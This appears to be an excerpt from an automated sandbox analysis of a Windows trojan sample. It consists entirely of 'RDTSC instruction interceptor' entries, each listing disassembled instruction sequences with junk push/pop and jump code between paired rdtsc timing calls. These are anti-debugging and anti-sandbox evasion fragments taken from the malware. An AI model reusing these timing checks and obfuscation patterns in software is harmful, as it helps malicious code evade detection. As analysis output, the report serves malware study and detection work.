Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC1F54 second address: BC1F58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BCA2A5 second address: BCA2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC8E74 second address: BC8E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC915E second address: BC917A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007FABC9471C35h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC92B2 second address: BC92CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD760h 0x00000007 jnc 00007FABC90CD756h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC9413 second address: BC9419 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC9419 second address: BC9423 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FABC90CD771h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BC9556 second address: BC955B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BCE71E second address: BCE730 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FABC90CD75Eh 0x0000000a jbe 00007FABC90CD756h 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BCE730 second address: BCE735 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BCE735 second address: BCE748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BCE8A7 second address: BCE8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b push ebx 0x0000000c jmp 00007FABC9471C34h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BD1EC3 second address: BD1ED7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FABC90CD756h 0x0000000a jnc 00007FABC90CD756h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BE08EA second address: BE08EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BE0727 second address: BE0740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FABC90CD75Fh 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: BDB27E second address: BDB287 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0AAFE second address: C0AB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0AECD second address: C0AED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0AED2 second address: C0AEE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e ja 00007FABC90CD756h 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0AEE7 second address: C0AEEC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0B074 second address: C0B07A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0B07A second address: C0B0A0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FABC9471C26h 0x00000008 jmp 00007FABC9471C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C0B0A0 second address: C0B0A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C12E12 second address: C12E1E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jl 00007FABC9471C26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C12E1E second address: C12E25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: C12E25 second address: C12E2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0D9C second address: 4DD0DCA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov di, 3A0Ah 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD761h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FABC90CD75Dh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0BC2 second address: 4DC0BF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FABC9471C37h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0BF0 second address: 4DC0BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0BF6 second address: 4DC0C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop edx 0x0000000d mov al, 58h 0x0000000f popad 0x00000010 mov edi, 0F967BF6h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 jmp 00007FABC9471C33h 0x0000001d mov dl, al 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 movsx edx, ax 0x00000026 movzx eax, di 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FABC9471C30h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA00F7 second address: 4DA0194 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 1CFAEE61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 0F9Dh 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 jmp 00007FABC90CD766h 0x00000015 mov eax, 19AB3141h 0x0000001a popad 0x0000001b push eax 0x0000001c jmp 00007FABC90CD767h 0x00000021 xchg eax, ebp 0x00000022 jmp 00007FABC90CD766h 0x00000027 mov ebp, esp 0x00000029 pushad 0x0000002a mov ax, 1BCDh 0x0000002e pushfd 0x0000002f jmp 00007FABC90CD75Ah 0x00000034 add eax, 3A37D4E8h 0x0000003a jmp 00007FABC90CD75Bh 0x0000003f popfd 0x00000040 popad 0x00000041 push dword ptr [ebp+04h] 0x00000044 pushad 0x00000045 mov ebx, ecx 0x00000047 popad 0x00000048 push dword ptr [ebp+0Ch] 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f jmp 00007FABC90CD75Fh 0x00000054 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0194 second address: 4DA0198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA0198 second address: 4DA019E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA019E second address: 4DA01AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA01F0 second address: 4DA01F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA01F4 second address: 4DA01FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DA01FA second address: 4DA020B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC09D5 second address: 4DC09E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC9471C2Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC09E7 second address: 4DC0A17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FABC90CD766h 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0A17 second address: 4DC0A1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0A1B second address: 4DC0A1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0A1F second address: 4DC0A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0453 second address: 4DC0459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0459 second address: 4DC045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC045E second address: 4DC0464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0464 second address: 4DC04F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov si, 4ACDh 0x00000011 mov edi, esi 0x00000013 popad 0x00000014 push eax 0x00000015 jmp 00007FABC9471C2Fh 0x0000001a xchg eax, ebp 0x0000001b jmp 00007FABC9471C36h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007FABC9471C2Eh 0x00000029 jmp 00007FABC9471C35h 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007FABC9471C2Eh 0x00000037 adc si, 27D8h 0x0000003c jmp 00007FABC9471C2Bh 0x00000041 popfd 0x00000042 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0EEE second address: 4DC0EF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0EF4 second address: 4DC0EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0EF8 second address: 4DC0F11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC90CD75Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0F11 second address: 4DC0F17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0F17 second address: 4DC0F26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FABC90CD75Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0F26 second address: 4DC0F2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC0F2A second address: 4DC0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD764h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ebx, esi 0x00000012 call 00007FABC90CD75Ah 0x00000017 pop ebx 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FABC90CD75Ch 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FABC90CD767h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE01CF second address: 4DE01EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FABC9471C39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE01EC second address: 4DE01F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE01F2 second address: 4DE01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE01F6 second address: 4DE0233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007FABC90CD764h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007FABC90CD760h 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov bl, 02h 0x0000001d mov esi, 318F2F75h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0233 second address: 4DE0295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FABC9471C2Dh 0x00000009 adc eax, 37FC5886h 0x0000000f jmp 00007FABC9471C31h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push edx 0x0000001f pop ecx 0x00000020 pushfd 0x00000021 jmp 00007FABC9471C2Fh 0x00000026 xor ah, FFFFFFBEh 0x00000029 jmp 00007FABC9471C39h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0295 second address: 4DE029B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE029B second address: 4DE029F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE029F second address: 4DE02A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE02A3 second address: 4DE02C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c push edi 0x0000000d push esi 0x0000000e pop edx 0x0000000f pop ecx 0x00000010 mov ax, dx 0x00000013 popad 0x00000014 and dword ptr [eax+04h], 00000000h 0x00000018 pushad 0x00000019 mov ebx, 62C337E8h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE02C3 second address: 4DE0302 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FABC90CD763h 0x00000008 or si, 972Eh 0x0000000d jmp 00007FABC90CD769h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0302 second address: 4DE0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0306 second address: 4DE030C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DC03DB second address: 4DC0423 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, cx 0x00000006 mov esi, 428D0F67h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 mov esi, 56A2845Fh 0x00000017 pushfd 0x00000018 jmp 00007FABC9471C34h 0x0000001d or ecx, 0246D8C8h 0x00000023 jmp 00007FABC9471C2Bh 0x00000028 popfd 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c pushad 0x0000002d mov cl, DFh 0x0000002f push eax 0x00000030 push edx 0x00000031 push edi 0x00000032 pop esi 0x00000033 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0D2E second address: 4DD0D4E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FABC90CD765h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0D4E second address: 4DD0D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DD0D54 second address: 4DD0D58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE004A second address: 4DE0050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0050 second address: 4DE0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0054 second address: 4DE0058 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0058 second address: 4DE0095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FABC90CD766h 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 movsx ebx, si 0x00000015 jmp 00007FABC90CD766h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE0095 second address: 4DE009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.TrojanX-gen.22664.27275.exe	RDTSC instruction interceptor: First address: 4DE009B second address: 4DE009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
